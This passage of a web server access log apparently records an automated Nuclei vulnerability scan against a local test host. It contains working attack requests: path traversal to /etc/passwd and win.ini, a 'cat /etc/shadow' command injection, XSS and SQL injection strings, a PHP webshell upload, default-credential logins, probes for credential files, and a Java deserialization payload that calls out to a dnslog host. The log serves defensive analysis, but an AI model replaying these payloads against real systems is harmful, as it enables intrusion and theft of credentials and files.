HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x2229KAY58zkRgMxaQdW0T2xOSBKvr.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/29KAY58zkRgMxaQdW0T2xOSBKvr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 